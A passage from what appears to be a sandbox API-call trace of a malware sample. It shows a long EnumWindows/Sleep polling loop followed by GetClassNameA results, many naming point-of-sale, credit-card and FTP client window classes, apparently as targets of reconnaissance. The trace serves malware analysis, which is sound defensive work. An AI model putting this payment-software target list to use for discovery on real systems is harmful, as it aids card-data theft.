(lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0276.606] Sleep (dwMilliseconds=0x64) [0276.686] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0276.686] Sleep (dwMilliseconds=0x64) [0276.739] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0276.742] Sleep (dwMilliseconds=0x64) [0276.811] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0276.811] Sleep (dwMilliseconds=0x64) [0276.864] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0276.868] Sleep (dwMilliseconds=0x64) [0276.909] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0276.909] Sleep (dwMilliseconds=0x64) [0276.957] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0276.957] Sleep (dwMilliseconds=0x64) [0277.042] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0277.043] Sleep (dwMilliseconds=0x64) [0277.098] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0277.098] Sleep (dwMilliseconds=0x64) [0277.144] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0277.145] Sleep (dwMilliseconds=0x64) [0277.196] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0277.196] Sleep (dwMilliseconds=0x64) [0277.198] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0277.199] Sleep (dwMilliseconds=0x64) [0277.239] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0277.240] Sleep (dwMilliseconds=0x64) [0277.332] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0277.333] Sleep (dwMilliseconds=0x64) [0277.380] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0277.381] Sleep (dwMilliseconds=0x64) [0277.431] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0277.432] Sleep (dwMilliseconds=0x64) [0277.475] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0277.478] Sleep (dwMilliseconds=0x64) [0277.553] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0277.556] Sleep (dwMilliseconds=0x64) [0277.594] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0277.594] Sleep (dwMilliseconds=0x64) [0277.606] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0277.607] Sleep (dwMilliseconds=0x64) [0277.976] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0277.976] Sleep (dwMilliseconds=0x64) [0278.072] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0278.073] Sleep (dwMilliseconds=0x64) [0278.203] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0278.204] Sleep (dwMilliseconds=0x64) [0278.244] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0278.248] Sleep (dwMilliseconds=0x64) [0278.342] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0278.343] Sleep (dwMilliseconds=0x64) [0278.423] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0278.424] Sleep (dwMilliseconds=0x64) [0278.467] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0278.467] Sleep (dwMilliseconds=0x64) [0278.520] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0278.521] Sleep (dwMilliseconds=0x64) [0278.576] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0278.576] Sleep (dwMilliseconds=0x64) [0278.643] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0278.644] Sleep (dwMilliseconds=0x64) [0278.740] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0278.740] Sleep (dwMilliseconds=0x64) [0278.782] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0278.782] Sleep (dwMilliseconds=0x64) [0278.834] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0278.834] Sleep (dwMilliseconds=0x64) [0278.863] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0278.864] Sleep (dwMilliseconds=0x64) [0278.958] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0278.958] Sleep (dwMilliseconds=0x64) [0279.000] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0279.000] Sleep (dwMilliseconds=0x64) [0279.062] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0279.062] Sleep (dwMilliseconds=0x64) [0279.113] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0279.113] Sleep (dwMilliseconds=0x64) [0279.130] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0279.130] Sleep (dwMilliseconds=0x64) [0279.153] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0279.154] Sleep (dwMilliseconds=0x64) [0279.202] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0279.202] Sleep (dwMilliseconds=0x64) [0279.279] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0279.280] Sleep (dwMilliseconds=0x64) [0279.530] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0279.530] Sleep (dwMilliseconds=0x64) [0279.731] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0279.731] Sleep (dwMilliseconds=0x64) [0279.997] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0279.997] Sleep (dwMilliseconds=0x64) [0280.136] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0280.137] Sleep (dwMilliseconds=0x64) [0280.362] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0280.362] Sleep (dwMilliseconds=0x64) [0280.450] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0280.451] Sleep (dwMilliseconds=0x64) [0280.561] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0280.562] Sleep (dwMilliseconds=0x64) [0280.651] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0280.652] Sleep (dwMilliseconds=0x64) [0280.715] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0280.716] Sleep (dwMilliseconds=0x64) [0280.779] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0280.780] Sleep (dwMilliseconds=0x64) [0280.873] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0280.873] Sleep (dwMilliseconds=0x64) [0280.891] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0280.892] Sleep (dwMilliseconds=0x64) [0280.902] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0280.902] Sleep (dwMilliseconds=0x64) [0280.933] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0280.934] Sleep (dwMilliseconds=0x64) [0281.011] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0281.012] Sleep (dwMilliseconds=0x64) [0281.105] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0281.106] Sleep (dwMilliseconds=0x64) [0281.199] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0281.200] Sleep (dwMilliseconds=0x64) [0281.530] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0281.530] Sleep (dwMilliseconds=0x64) [0281.670] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0281.670] Sleep (dwMilliseconds=0x64) [0281.811] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0281.812] Sleep (dwMilliseconds=0x64) [0281.878] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0281.879] Sleep (dwMilliseconds=0x64) [0281.921] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0281.922] Sleep (dwMilliseconds=0x64) [0281.967] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0281.968] Sleep (dwMilliseconds=0x64) [0282.026] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0282.027] Sleep (dwMilliseconds=0x64) [0282.108] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0282.108] Sleep (dwMilliseconds=0x64) [0282.221] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0282.221] Sleep (dwMilliseconds=0x64) [0282.296] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0282.296] Sleep (dwMilliseconds=0x64) [0282.389] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0282.390] Sleep (dwMilliseconds=0x64) [0282.469] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0282.469] Sleep (dwMilliseconds=0x64) [0282.511] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0282.515] Sleep (dwMilliseconds=0x64) [0282.561] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0282.562] Sleep (dwMilliseconds=0x64) [0282.622] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0282.623] Sleep (dwMilliseconds=0x64) [0282.718] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0282.718] Sleep (dwMilliseconds=0x64) [0282.810] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0282.811] Sleep (dwMilliseconds=0x64) [0282.939] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0282.939] Sleep (dwMilliseconds=0x64) [0283.026] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0283.027] Sleep (dwMilliseconds=0x64) [0283.060] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0283.061] Sleep (dwMilliseconds=0x64) [0283.107] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0283.108] Sleep (dwMilliseconds=0x64) [0283.138] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0283.138] Sleep (dwMilliseconds=0x64) [0283.154] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0283.155] Sleep (dwMilliseconds=0x64) [0283.245] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0283.246] Sleep (dwMilliseconds=0x64) [0283.347] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0283.347] Sleep (dwMilliseconds=0x64) [0283.452] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0283.453] Sleep (dwMilliseconds=0x64) [0283.529] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0283.529] Sleep (dwMilliseconds=0x64) [0283.624] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0283.624] Sleep (dwMilliseconds=0x64) [0283.671] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0283.672] Sleep (dwMilliseconds=0x64) [0283.717] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0283.717] Sleep (dwMilliseconds=0x64) [0283.753] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0283.754] Sleep (dwMilliseconds=0x64) [0283.763] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0283.763] Sleep (dwMilliseconds=0x64) [0283.823] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0283.824] Sleep (dwMilliseconds=0x64) [0283.936] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0283.937] Sleep (dwMilliseconds=0x64) [0284.014] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0284.014] Sleep (dwMilliseconds=0x64) [0284.253] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0284.253] Sleep (dwMilliseconds=0x64) [0284.655] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0284.656] Sleep (dwMilliseconds=0x64) [0284.709] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0284.710] Sleep (dwMilliseconds=0x64) [0284.716] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0284.717] Sleep (dwMilliseconds=0x64) [0284.755] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0284.756] Sleep (dwMilliseconds=0x64) [0284.801] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0284.802] Sleep (dwMilliseconds=0x64) [0284.875] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0284.875] Sleep (dwMilliseconds=0x64) [0284.916] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0284.917] Sleep (dwMilliseconds=0x64) [0284.962] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0284.963] Sleep (dwMilliseconds=0x64) [0285.046] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0285.047] Sleep (dwMilliseconds=0x64) [0285.134] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0285.134] Sleep (dwMilliseconds=0x64) [0285.181] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0285.181] Sleep (dwMilliseconds=0x64) [0285.236] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0285.236] Sleep (dwMilliseconds=0x64) [0285.247] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0285.248] Sleep (dwMilliseconds=0x64) [0285.292] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0285.293] Sleep (dwMilliseconds=0x64) [0285.332] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0285.333] Sleep (dwMilliseconds=0x64) [0285.340] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0285.340] Sleep (dwMilliseconds=0x64) [0285.384] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0285.388] Sleep (dwMilliseconds=0x64) [0285.482] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0285.483] Sleep (dwMilliseconds=0x64) [0285.560] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0285.560] Sleep (dwMilliseconds=0x64) [0285.630] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0285.630] Sleep (dwMilliseconds=0x64) [0285.675] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0285.676] Sleep (dwMilliseconds=0x64) [0285.838] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0285.838] Sleep (dwMilliseconds=0x64) [0285.939] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0285.939] Sleep (dwMilliseconds=0x64) [0285.986] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0285.987] Sleep (dwMilliseconds=0x64) [0286.042] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0286.043] Sleep (dwMilliseconds=0x64) [0286.137] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0286.137] Sleep (dwMilliseconds=0x64) [0286.233] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0286.234] Sleep (dwMilliseconds=0x64) [0286.315] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0286.316] Sleep (dwMilliseconds=0x64) [0286.358] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0286.358] Sleep (dwMilliseconds=0x64) [0286.403] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0286.403] Sleep (dwMilliseconds=0x64) [0286.498] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0286.499] Sleep (dwMilliseconds=0x64) [0286.545] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0286.545] Sleep (dwMilliseconds=0x64) [0286.589] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0286.590] Sleep (dwMilliseconds=0x64) [0286.685] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0286.685] Sleep (dwMilliseconds=0x64) [0286.733] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0286.733] Sleep (dwMilliseconds=0x64) [0286.853] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0286.853] Sleep (dwMilliseconds=0x64) [0287.018] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0287.019] Sleep (dwMilliseconds=0x64) [0287.089] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0287.089] Sleep (dwMilliseconds=0x64) [0287.187] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0287.188] Sleep (dwMilliseconds=0x64) [0287.236] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0287.237] Sleep (dwMilliseconds=0x64) [0287.280] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0287.280] Sleep (dwMilliseconds=0x64) [0287.323] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0287.324] Sleep (dwMilliseconds=0x64) [0287.420] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0287.421] Sleep (dwMilliseconds=0x64) [0287.495] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0287.496] Sleep (dwMilliseconds=0x64) [0287.561] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0287.562] Sleep (dwMilliseconds=0x64) [0287.855] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0287.856] Sleep (dwMilliseconds=0x64) [0287.981] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0287.982] Sleep (dwMilliseconds=0x64) [0288.168] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0288.168] Sleep (dwMilliseconds=0x64) [0288.259] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0288.261] Sleep (dwMilliseconds=0x64) [0288.373] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0288.373] Sleep (dwMilliseconds=0x64) [0288.480] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0288.480] Sleep (dwMilliseconds=0x64) [0288.622] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0288.622] Sleep (dwMilliseconds=0x64) [0288.732] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0288.759] Sleep (dwMilliseconds=0x64) [0288.968] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0288.969] Sleep (dwMilliseconds=0x64) [0288.998] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0288.999] Sleep (dwMilliseconds=0x64) [0289.047] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0289.048] Sleep (dwMilliseconds=0x64) [0289.138] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0289.139] Sleep (dwMilliseconds=0x64) [0289.296] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0289.296] Sleep (dwMilliseconds=0x64) [0289.404] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0289.404] Sleep (dwMilliseconds=0x64) [0289.485] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0289.485] Sleep (dwMilliseconds=0x64) [0289.514] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0289.515] Sleep (dwMilliseconds=0x64) [0289.561] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0289.562] Sleep (dwMilliseconds=0x64) [0289.596] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0289.596] Sleep (dwMilliseconds=0x64) [0289.605] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0289.764] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) returned 1 [0289.764] GetClassNameA (in: hWnd=0x100ec, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0289.764] GetClassNameA (in: hWnd=0x1014a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0289.764] GetClassNameA (in: hWnd=0x1010e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0289.764] GetClassNameA (in: hWnd=0x1011c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0289.764] GetClassNameA (in: hWnd=0x10120, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0289.764] GetClassNameA (in: hWnd=0x10122, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0289.765] GetClassNameA (in: hWnd=0x1011e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0289.765] GetClassNameA (in: hWnd=0x1011a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0289.765] GetClassNameA (in: hWnd=0x10118, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0289.765] GetClassNameA (in: hWnd=0x10116, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0289.765] GetClassNameA (in: hWnd=0x10114, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0289.765] GetClassNameA (in: hWnd=0x10178, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0289.765] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0289.765] GetClassNameA (in: hWnd=0x1015a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0289.765] GetClassNameA (in: hWnd=0x10112, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0289.765] GetClassNameA (in: hWnd=0x10102, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ApplicationManager_ImmersiveShellWindow") returned 39 [0289.765] GetClassNameA (in: hWnd=0x10198, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0289.765] GetClassNameA (in: hWnd=0x10196, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="VSyncHelper-00000000061A2330-1a4b5f2") returned 36 [0289.765] GetClassNameA (in: hWnd=0x1018e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="RawInputClass") returned 13 [0289.765] GetClassNameA (in: hWnd=0x10188, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0289.765] GetClassNameA (in: hWnd=0x100d8, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0289.765] GetClassNameA (in: hWnd=0x100b2, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0289.765] GetClassNameA (in: hWnd=0x100b6, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0289.765] GetClassNameA (in: hWnd=0x100c2, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0289.765] GetClassNameA (in: hWnd=0x100cc, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0289.765] GetClassNameA (in: hWnd=0x100d0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0289.766] GetClassNameA (in: hWnd=0x10098, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0289.766] GetClassNameA (in: hWnd=0x100a6, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0289.766] GetClassNameA (in: hWnd=0x100ca, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0289.766] GetClassNameA (in: hWnd=0x1008c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0289.766] GetClassNameA (in: hWnd=0x20030, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ATL:00007FFA00814120") returned 20 [0289.766] GetClassNameA (in: hWnd=0x100e6, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0289.766] GetClassNameA (in: hWnd=0x100da, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0289.766] GetClassNameA (in: hWnd=0x80088, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0289.766] GetClassNameA (in: hWnd=0x103ac, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Federalhotelwindow") returned 18 [0289.766] GetClassNameA (in: hWnd=0x20254, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0289.766] GetClassNameA (in: hWnd=0x2024e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Bed_Fight_cls") returned 13 [0289.766] GetClassNameA (in: hWnd=0x103a6, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="StyleDesignbusinesswnd") returned 22 [0289.766] GetClassNameA (in: hWnd=0x103a8, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="NewDoorwindow") returned 13 [0289.766] GetClassNameA (in: hWnd=0x103a4, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="discussionwindow") returned 16 [0289.766] GetClassNameA (in: hWnd=0x1039a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="VSyncHelper-00861820-7f9fa25") returned 28 [0289.766] GetClassNameA (in: hWnd=0x10386, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="utg2cls") returned 7 [0289.766] GetClassNameA (in: hWnd=0x10384, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="spgagentserviceapp") returned 18 [0289.766] GetClassNameA (in: hWnd=0x10374, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="omniposwin") returned 10 [0289.766] GetClassNameA (in: hWnd=0x10370, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="mxslipstreamcls") returned 15 [0289.766] GetClassNameA (in: hWnd=0x10380, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="spcwinapp") returned 9 [0289.767] GetClassNameA (in: hWnd=0x202b4, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="TabThumbnailWindow") returned 18 [0289.767] GetClassNameA (in: hWnd=0x1036e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="isspos_cls") returned 10 [0289.767] GetClassNameA (in: hWnd=0x20288, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="fpos_class") returned 10 [0289.767] GetClassNameA (in: hWnd=0x10366, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="edcsvrcls") returned 9 [0289.767] GetClassNameA (in: hWnd=0x1035a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="centralcreditcardclass") returned 22 [0289.767] GetClassNameA (in: hWnd=0x10362, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="creditservice_class") returned 19 [0289.767] GetClassNameA (in: hWnd=0x1035c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ccv_serverclass") returned 15 [0289.767] GetClassNameA (in: hWnd=0x1034e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="afr38_app") returned 9 [0289.767] GetClassNameA (in: hWnd=0x10350, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="aldelowin") returned 9 [0289.767] GetClassNameA (in: hWnd=0x10312, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="smartftp_cls") returned 12 [0289.767] GetClassNameA (in: hWnd=0x10332, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="active-chargewin") returned 16 [0289.767] GetClassNameA (in: hWnd=0x10334, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="accuposwnd") returned 10 [0289.767] GetClassNameA (in: hWnd=0x1032a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="winscp_win") returned 10 [0289.767] GetClassNameA (in: hWnd=0x1032c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="yahoomessengerwin") returned 17 [0289.767] GetClassNameA (in: hWnd=0x1030e, lpClassName=0x1076fd50, nMaxCount=260 | out: 